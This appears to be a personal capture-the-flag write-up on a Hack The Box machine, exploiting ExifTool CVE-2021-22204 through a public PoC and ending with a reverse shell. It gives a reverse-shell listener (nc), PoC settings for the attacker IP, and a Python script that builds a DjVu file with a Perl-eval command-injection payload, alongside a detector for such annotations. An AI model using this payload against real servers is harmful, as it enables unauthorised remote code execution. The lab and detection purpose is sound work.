CTF Meta

  1. hosts
  2. rustscan
  3. wfuzz
  4. Exploit ExifTool
    1. Install exiftool
    2. Install djvulibre
    3. Download
    4. Edit the file
    5. Open the listener
  5. BOOMMMM
  6. Exploit pwnkit

hosts

/etc/hosts
10.10.11.140 artcorp.htb

rustscan

rustscan -a artcorp.htb --range 1-65000

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

wfuzz

Nothing with the directory listing.
But with the subdomain (vhost) fuzzing I have this:
https://infinitelogins.com/2020/09/02/bruteforcing-subdomains-wfuzz/

wfuzz -c -f sub-fighter -w Documents/wordlist/subdomains.lst -u 'http://artcorp.htb' -H "Host: FUZZ.artcorp.htb" --hw 9000 |grep 200


dev01.artcorp.htb
I add it to my /etc/hosts.


It's an EXIF tool: you upload an image and it shows you the metadata.

Exploit ExifTool

https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
I found this website, which gives useful info.
CVE-2021-22204
https://github.com/convisolabs/CVE-2021-22204-exiftool

Install exiftool

https://exiftool.org/install.html

Install djvulibre

sudo pacman -S djvulibre

Download

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git

Edit the file

ip = '10.10.15.22'   # attacker (listener) IP
port = '4444'        # listener port, must match the nc below

Open the listener

nc -nlvp 4444

BOOMMMM

I upload the file and the shell pops.
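What the PoC's payload file actually is, as an added example that is not from this page or from the convisolabs repository: the script below assembles a minimal single-page DjVu (the `AT&T` magic, then an IFF `FORM:DJVU` holding an `INFO` and an uncompressed `ANTa` chunk) around an annotation string in the shape the public CVE-2021-22204 PoCs use, parses the file back, and flags annotation text that carries Perl interpolation (`${...}`, `@{...}`) or the `\c` escape that sent the string down the eval path. The command `id`, the 1x1 page at 300 dpi and the version/gamma bytes are placeholders, and the `INFO` field order is my reading of the DjVu spec (an assumption worth checking against `djvudump`).

```python
"""Minimal DjVu builder/inspector for the CVE-2021-22204 annotation trick.

Added example for this writeup; not code from the page or from the
convisolabs PoC. The payload string shape follows the public PoCs; the
container layout follows the DjVu spec (INFO field order assumed as noted).
"""
import re
import struct

MAGIC = b"AT&T"   # every DjVu file starts with this, then an IFF FORM


def iff_chunk(chunk_id: bytes, data: bytes) -> bytes:
    """Encode one IFF chunk: 4-byte id, big-endian length, data, pad to even."""
    if len(chunk_id) != 4:
        raise ValueError("chunk id must be 4 bytes")
    out = chunk_id + struct.pack(">I", len(data)) + data
    if len(data) % 2:
        out += b"\x00"
    return out


def info_chunk(width: int = 1, height: int = 1, dpi: int = 300) -> bytes:
    """INFO chunk: width, height (BE16), minor/major version, dpi (LE16),
    gamma, flags. Version 26/0, gamma 22 (2.2) and a 1x1 page are placeholders;
    the field order is taken from the DjVu spec (assumption: check with djvudump)."""
    data = struct.pack(">HHBB", width, height, 26, 0)
    data += struct.pack("<H", dpi) + bytes([22, 0])
    return iff_chunk(b"INFO", data)


def build_djvu(annotation: str) -> bytes:
    """Single-page DjVu holding only INFO and an uncompressed ANTa annotation."""
    body = b"DJVU" + info_chunk() + iff_chunk(b"ANTa", annotation.encode())
    return MAGIC + b"FORM" + struct.pack(">I", len(body)) + body


def rce_annotation(cmd: str) -> str:
    """Annotation in the shape the public PoCs use. The '\\c' escape was not
    handled by exiftool's own substitutions, so the string went through Perl
    eval, where '${...}' interpolates and runs arbitrary Perl. cmd is a
    placeholder shell command."""
    return '(metadata "\\c${system(\'%s\')};")' % cmd


def parse_chunks(data: bytes):
    """Yield (chunk_id, payload) for the top-level chunks of a single-page DjVu."""
    if data[:4] != MAGIC or data[4:8] != b"FORM" or data[12:16] != b"DJVU":
        raise ValueError("not a single-page DjVu file")
    form_len = struct.unpack(">I", data[8:12])[0]
    pos, end = 16, 12 + form_len
    while pos + 8 <= end:
        chunk_id = data[pos:pos + 4]
        length = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        yield chunk_id, data[pos + 8:pos + 8 + length]
        pos += 8 + length + (length % 2)   # skip the pad byte on odd lengths


# Perl code interpolation inside an eval'd string, plus the escape that
# triggered the eval path. Multi-page DJVM forms and bzz-compressed ANTz
# chunks are out of scope here.
SUSPICIOUS = re.compile(r"\$\{|@\{|\\c")


def suspicious_annotations(data: bytes) -> list:
    """Return every ANTa annotation whose text matches SUSPICIOUS."""
    hits = []
    for chunk_id, payload in parse_chunks(data):
        if chunk_id == b"ANTa":
            text = payload.decode("latin-1")
            if SUSPICIOUS.search(text):
                hits.append(text)
    return hits


if __name__ == "__main__":
    evil = build_djvu(rce_annotation("id"))
    benign = build_djvu('(metadata (Author "x"))')
    print([c for c, _ in parse_chunks(evil)])   # [b'INFO', b'ANTa']
    print(suspicious_annotations(evil))
    print(suspicious_annotations(benign))       # []
```

ExifTool before 12.24 handed the escaped annotation string to Perl eval while parsing `ANTa`, so the `${system('...')}` runs on the server the moment the uploaded image is read; the linked PoC then hides the .djvu inside a JPEG through a user-defined tag loaded with `exiftool -config`, which is why a plain `.jpg` upload is enough. The detector only reads uncompressed `ANTa` text: the PoC ships an `ANTz` chunk produced with `bzz`, so on the defensive side such chunks must be decompressed (`bzz -d`) before their text can be checked.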

Exploit pwnkit

It’s not working.

I think I have to get the user first.
I should also make a directory with all my tools and start the Python HTTP server when I need them.

I need to go to sleep…